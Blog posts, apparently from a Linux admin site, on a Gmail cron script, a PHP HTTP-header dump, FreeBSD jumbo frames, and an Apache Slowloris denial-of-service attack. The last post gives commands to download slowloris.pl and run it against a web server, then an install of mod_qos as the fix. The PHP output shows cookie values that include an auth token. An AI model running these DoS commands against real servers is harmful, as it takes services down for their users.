are 100% correct.

To launch the script on 15 minutes cronjob, put it somewhere and place a cron in (non-root) user:

# crontab -u root -e
...
*/15 * * * * /path/to/check_gmail_unread_mail.sh

Once you read your new emails in lets say Thunderbird, close it and on the next delivered unread gmail mails, your mail client will pop up by itself again. Once the mail client is closed the script execution will be terminated.
Consised that if you get too frequently gmail emails, using the script might be annoying as every 15 minutes your mail client will be re-opened.

If you use any of the shell scripts, make sure there are well secured (make it owned only by you). The gmail username and pass are in plain text, so someone can steal your password, very easily. For a one user Linux desktops systems as my case, security is not such a big concern, putting my user only readable script permissions (e.g. chmod 0700)is enough.

Tiny PHP script to dump your browser set HTTP headers (useful in debugging)

Friday, March 30th, 2012

While browsing I stumbled upon a nice blog article

Dumping HTTP headers

The arcitle, points at few ways to DUMP the HTTP headers obtained from user browser.
As I'm not proficient with Ruby, Java and AOL Server what catched my attention is a tiny php for loop, which loops through all the HTTP_* browser set variables and prints them out. Here is the PHP script code:

<?php<br />
foreach($_SERVER as $h=>$v)<br />
if(ereg('HTTP_(.+)',$h,$hp))<br />
echo "<li>$h = $v</li>\n";<br />
header('Content-type: text/html');<br />
?>

The script is pretty easy to use, just place it in a directory on a WebServer capable of executing php and save it under a name like:
show_HTTP_headers.php

If you don't want to bother copy pasting above code, you can also download the dump_HTTP_headers.php script here , rename the dump_HTTP_headers.php.txt to dump_HTTP_headers.php and you're ready to go.

Follow to the respective url to exec the script. I've installed the script on my webserver, so if you are curious of the output the script will be returning check your own browser HTTP set values by clicking here.
PHP will produce output like the one in the screenshot you see below, the shot is taken from my Opera browser:

Screenshot show HTTP headers.php script Opera Debian Linux

Another sample of the text output the script produce whilst invoked in my Epiphany GNOME browser is:

HTTP_HOST = www.pc-freak.net
HTTP_USER_AGENT = Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+ Debian/squeeze (2.30.6-1) Epiphany/2.30.6
HTTP_ACCEPT = application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
HTTP_ACCEPT_ENCODING = gzip
HTTP_ACCEPT_LANGUAGE = en-us, en;q=0.90
HTTP_COOKIE = __qca=P0-2141911651-1294433424320;
__utma_a2a=8614995036.1305562814.1274005888.1319809825.1320152237.2021;wooMeta=MzMxJjMyOCY1NTcmODU1MDMmMTMwODQyNDA1MDUyNCYxMzI4MjcwNjk0ODc0JiYxMDAmJjImJiYm; 3ec0a0ded7adebfeauth=22770a75911b9fb92360ec8b9cf586c9;
__unam=56cea60-12ed86f16c4-3ee02a99-3019;
__utma=238407297.1677217909.1260789806.1333014220.1333023753.1606;
__utmb=238407297.1.10.1333023754; __utmc=238407297;
__utmz=238407297.1332444980.1586.413.utmcsr=pc-freak.net|utmccn=(referral)|utmcmd=referral|utmcct=/blog/

You see the script returns, plenty of useful information for debugging purposes:
HTTP_HOST – Virtual Host Webserver name
HTTP_USER_AGENT – The browser exact type useragent returnedHTTP_ACCEPT – the type of MIME applications accepted by the WebServerHTTP_ACCEPT_LANGUAGE – The language types the browser has support for
HTTP_ACCEPT_ENCODING – This PHP variable is usually set to gzip or deflate by the browser if the browser has support for webserver returned content gzipping.
If HTTP_ACCEPT_ENCODING is there, then this means remote webserver is configured to return its HTML and static files in gzipped form.
HTTP_COOKIE – Information about browser cookies, this info can be used for XSS attacks etc. 🙂
HTTP_COOKIE also contains the referrar which in the above case is:
__utmz=238407297.1332444980.1586.413.utmcsr=pc-freak.net|utmccn=(referral)
The Cookie information HTTP var also contains information of the exact link referrar:
|utmcmd=referral|utmcct=/blog/

For the sake of comparison show_HTTP_headers.php script output from elinks text browser is like so:

* HTTP_HOST = www.pc-freak.net
* HTTP_USER_AGENT = Links (2.3pre1; Linux 2.6.32-5-amd64 x86_64; 143x42)
* HTTP_ACCEPT = */*
* HTTP_ACCEPT_ENCODING = gzip,deflate * HTTP_ACCEPT_CHARSET = us-ascii, ISO-8859-1, ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-9, ISO-8859-10, ISO-8859-13, ISO-8859-14, ISO-8859-15, ISO-8859-16, windows-1250, windows-1251, windows-1252, windows-1256,
windows-1257, cp437, cp737, cp850, cp852, cp866, x-cp866-u, x-mac, x-mac-ce, x-kam-cs, koi8-r, koi8-u, koi8-ru, TCVN-5712, VISCII,utf-8 * HTTP_ACCEPT_LANGUAGE = en,*;q=0.1
* HTTP_CONNECTION = keep-alive
One good reason, why it is good to give this script a run is cause it can help you reveal problems with HTTP headers impoperly set cookies, language encoding problems, security holes etc. Also the script is a good example, for starters in learning PHP programming.

 

FreeBSD Jumbo Frames network configuration short how to

Wednesday, March 14th, 2012

FreeBSD Jumbo Frames Howto configure FreeBSD

Recently I wrote a post on how to enable Jumbo Frames on GNU / Linux , therefore I thought it will be useful to write how Jumbo Frames network boost can be achieved on FreeBSD too.

I will skip the details of what is Jumbo Frames, as in the previous article I have thoroughfully explained. Just in short to remind you what is Jumbo Frames and why you might need it? – it is a way to increase network MTU transfer frames from the MTU 1500 to MTU of 9000 bytes

It is interesting to mention that according to specifications, the maximum Jumbo Frames MTU possible for assignment are of MTU=16128
Just like on Linux to be able to take advantage of the bigger Jumbo Frames increase in network thoroughput, you need to have a gigabyt NIC card/s on the router / server.

1. Increasing MTU to 9000 to enable Jumbo Frames "manually"

Just like on Linux, the network tool to use is ifconfig. For those who don't know ifconfig on Linux is part of the net-tools package and rewritten from scratch especially for GNU / Linux OS, whether BSD's ifconfig is based on source code taken from 4.2BSD UNIX

As you know, network interface naming on FreeBSD is different, as there is no strict naming like on Linux (eth0, eth1, eth2), rather the interfaces are named after the name of the NIC card vendor for instance (Intel(R) PRO/1000 NIC is em0), RealTek is rl0 etc.

To set Jumbro Frames Maximum Transmission Units of 9000 on FreeBSD host with a Realtek and Intel gigabyt ethernet cards use:freebsd# /sbin/ifconfig em0 192.168.1.2 mtu 9000
freebsd# /sbin/ifconfig rl0 192.168.2.2 mtu 9000

!! Be very cautious here, as if you're connected to the system remotely over ssh you might loose connection to it because of broken routing.

To prevent routing loss problems, if you're executing the above two commands remotely, you better run them in GNU screen session:

freebsd# screen
freebsd# /sbin/ifconfig em0 192.168.1.2 mtu 9000; /sbin/ifconfig rl0 192.168.1.2 mtu 9000; \
/etc/rc.d/netif restart; /etc/rc.d/routed restart

2. Check MTU settings are set to 9000

If everything is fine the commands will return empty output, to check further the MTU is properly set to 9000 issue:

freebsd# /sbin/ifconfig -a|grep -i em0em0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 9000freebsd# /sbin/ifconfig -a|grep -i rl0
rl0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 9000

3. Reset routing for default gateway

If you have some kind of routing assigned for em0 and rl0, network interfaces they will be affected by the MTU change and the routing will be gone. To reset the routing to the previously properly assigned routing, you have to restart the BSD init script taking care for assigning routing on system boot time:

freebsd# /etc/rc.d/routing restart
default 192.168.1.1 done
add net default: gateway 192.168.1.1
Additional routing options: IP gateway=YES.

4. Change MTU settings for NIC card with route command

There is also a way to assign higher MTU without "breaking" the working routing, e.g. avoiding network downtime with bsd route command:

freebsd# grep -i defaultrouter /etc/rc.conf
defaultrouter="192.168.1.1"
freebsd# /sbin/route change 192.168.1.1 -mtu 9000
change host 192.168.1.1

5. Finding the new MTU NIC settings on the FreeBSD host

freebsd# /sbin/route -n get 192.168.1.1
route to: 192.168.1.1
destination: 192.168.1.1
interface: em0
flags: <UP,HOST,DONE,LLINFO,WASCLONED>
recvpipe sendpipe ssthresh rtt,msec rttvar hopcount mtu expire
0 0 0 0 0 0 9000 1009

6. Set Jumbo Frames to load automatically on system load

To make the increased MTU to 9000 for Jumbo Frames support permanent on a FreeBSD system the /etc/rc.conf file is used:

The variable for em0 and rl0 NICs are ifconfig_em0 and ifconfig_rl0.
The lines to place in /etc/rc.conf should be similar to:

ifconfig_em0="inet 192.168.1.1 netmask 255.255.255.0 media 1000baseTX mediaopt half-duplex mtu 9000"
ifconfig_em0="inet 192.168.1.1 netmask 255.255.255.0 media 1000baseTX mediaopt half-duplex mtu 9000"

Change in the above lines the gateway address 192.168.1.1 and the netmask 255.255.255.0 to yours corresponding gw and netmask.
Also in the above example you see the half-duplex ifconfig option is set insetad of full-duplex in order to prevent some duplex mismatches. A full-duplex could be used instead, if you're completely sure on the other side of the host is configured to support full-duplex connections. Otherwise if you try to set full-duplex with other side set to half-duplex or auto-duplex a duplex mismatch will occur. If this happens insetad of taking the advantage of the Increase Jumbo Frames MTU the network connection could become slower than originally with standard ethernet MTU of 1500. One other bad side if you end up with duplex-mismatch could be a high number of loss packets and degraded thoroughout …

7. Setting Jumbo Frames for interfaces assigning dynamic IP via DHCP

If you need to assign an MTU of 9000 for a gigabyt network interfaces, which are receiving its TCP/IP network configuration over DHCP server.
First, tell em0 and rl0 network interfaces to dynamically assign IP addresses via DHCP proto by adding in /etc/rc.conf:

ifconfig_em0="DHCP"
ifconfig_rl0="DHCP"

Secondly make two files /etc/start_if.em0 and /etc/start_if.rl0 and include in each file:

ifconfig em0 media 1000baseTX mediaopt full-duplex mtu 9000
ifconfig rl0 media 1000baseTX mediaopt full-duplex mtu 9000

Copy / paste in root console:

echo 'ifconfig em0 media 1000baseTX mediaopt full-duplex mtu 9000' >> /etc/start_if.em0
echo 'ifconfig rl0 media 1000baseTX mediaopt full-duplex mtu 9000' >> /etc/start_if.rl0

Finally, to load the new MTU for both interfaces, reload the IPs with the increased MTUs:

freebsd# /etc/rc.d/routing restart
default 192.168.1.1 done
add net default: gateway 192.168.1.1

8. Testing if Jumbo Frames is working correctly

To test if an MTU packs are transferred correctly through the network you can use ping or tcpdumpa.) Testing Jumbo Frames enabled packet transfers with tcpdump

freebsd# tcpdump -vvn | grep -i 'length 9000'

You should get output like:

16:40:07.432370 IP (tos 0x0, ttl 50, id 63903, offset 0, flags [DF], proto TCP (6), length 9000) 192.168.1.2.80 > 192.168.1.1.60213: . 85825:87285(1460) ack 668 win 14343
16:40:07.432588 IP (tos 0x0, ttl 50, id 63904, offset 0, flags [DF], proto TCP (6), length 9000) 192.168.1.2.80 > 192.168.1.1.60213: . 87285:88745(1460) ack 668 win 14343
16:40:07.433091 IP (tos 0x0, ttl 50, id 63905, offset 0, flags [DF], proto TCP (6), length 9000) 192.168.1.2.80 > 192.168.1.1.60213: . 23153:24613(1460) ack 668 win 14343
16:40:07.568388 IP (tos 0x0, ttl 50, id 63907, offset 0, flags [DF], proto TCP (6), length 9000) 192.168.1.2.80 > 192.168.1.1.60213: . 88745:90205(1460) ack 668 win 14343
16:40:07.568636 IP (tos 0x0, ttl 50, id 63908, offset 0, flags [DF], proto TCP (6), length 9000) 192.168.1.2.80 > 192.168.1.1.60213: . 90205:91665(1460) ack 668 win 14343
16:40:07.569012 IP (tos 0x0, ttl 50, id 63909, offset 0, flags [DF], proto TCP (6), length 9000) 192.168.1.2.80 > 192.168.1.1.60213: . 91665:93125(1460) ack 668 win 14343
16:40:07.569888 IP (tos 0x0, ttl 50, id 63910, offset 0, flags [DF], proto TCP (6), length 9000) 192.168.1.2.80 > 192.168.1.1.60213: . 93125:94585(1460) ack 668 win 14343

b.) Testing if Jumbo Frames are enabled with ping

Testing Jumbo Frames with ping command on Linux

linux:~# ping 192.168.1.1 -M do -s 8972
PING 192.168.1.1 (192.168.1.1) 8972(9000) bytes of data.
9000 bytes from 192.168.1.1: icmp_req=1 ttl=52 time=43.7 ms
9000 bytes from 192.168.1.1: icmp_req=2 ttl=52 time=43.3 ms
9000 bytes from 192.168.1.1: icmp_req=3 ttl=52 time=43.5 ms
9000 bytes from 192.168.1.1: icmp_req=4 ttl=52 time=44.6 ms
--- 192.168.0.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3003ms
rtt min/avg/max/mdev = 2.397/2.841/4.066/0.708 ms

If you get insetad an an output like:

From 192.168.1.2 icmp_seq=1 Frag needed and DF set (mtu = 1500)
From 192.168.1.2 icmp_seq=1 Frag needed and DF set (mtu = 1500)
From 192.168.1.2 icmp_seq=1 Frag needed and DF set (mtu = 1500)
From 192.168.1.2 icmp_seq=1 Frag needed and DF set (mtu = 1500)

--- 192.168.1.1 ping statistics ---
0 packets transmitted, 0 received, +4 errors

This means a packets with maximum MTU of 1500 could be transmitted and hence something is not okay with the Jumbo Frames config.
Another helpful command in debugging MTU and showing which host in a hop queue support jumbo frames is Linux's traceroute

To debug a path between host and target, you can use:

linux:~# traceroute --mtu www.google.com
...

If you want to test the Jumbo Frames configuration from a Windows host use ms-windows ping command like so:

C:\>ping 192.168.1.2 -f -l 8972
Pinging 192.168.1.2 with 8972 bytes of data:
Reply from 192.168.1.2: bytes=8972 time=2ms TTL=255
Reply from 192.168.1.2: bytes=8972 time=2ms TTL=255
Reply from 192.168.1.2: bytes=8972 time=2ms TTL=255
Reply from 192.168.1.2: bytes=8972 time=2ms TTL=255
Ping statistics for 192.168.1.2:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 2ms, Maximum = 2ms, Average = 2ms

Here -l 8972 value is actually equal to 9000. 8972 = 9000 – 20 (20 byte IP header) – 8 (ICMP header)

Apache Denial of Service (DoS) attack with Slowris / Crashing Apache

Monday, February 1st, 2010

slowloris-denial-of-service-apache-logo
A friend of mine pointed me to a nice tool that is able to create a succesful denial of service to
most of the running web servers out there. The tools is called slowris
For any further information there is the following publication on ha.ckers.org about slowris
The original article of the friend of mine is located on his (mpetrov.net) person blog .
Unfortunately the post is in Bulgarian so it’s not a match for English speaking audience.
To launch the attack on Debian Linux all you need is:

# apt-get install libio-all-perl libio-socket-ssl-perl
# wget http://ha.ckers.org/slowloris/slowloris.pl
now issue the attack
# perl slowloris.pl -dns example.com -port 80 -timeout 1 -num 200 -cache

There you go the Apache server is not responding, no-traces of the DoS are left on the server,
the log file is completely clear of records!
;The fix to the attack comes with installing the not so popular Apache module: mod_qos
# cd /tmp/
# wget http://freefr.dl.sourceforge.net/project/mod-qos/mod-qos/9.7/mod_qos-9.7.tar.gz
# tar zxvf mod_qos-9.7.tar.gz
# cd mod_qos-9.7/apache2/
# apxs2 -i -c mod_qos.cThe module is installing to "/usr/lib/apache2/modules"All left is configuring the module
# cd /etc/apache2/mods-available/
#vim qos.load

Add the following in the file:

LoadModule qos_module /usr/lib/apache2/modules/mod_qos.so

Cheers! 🙂
I should express my gratitude to Martin Petrov's blog for the great info.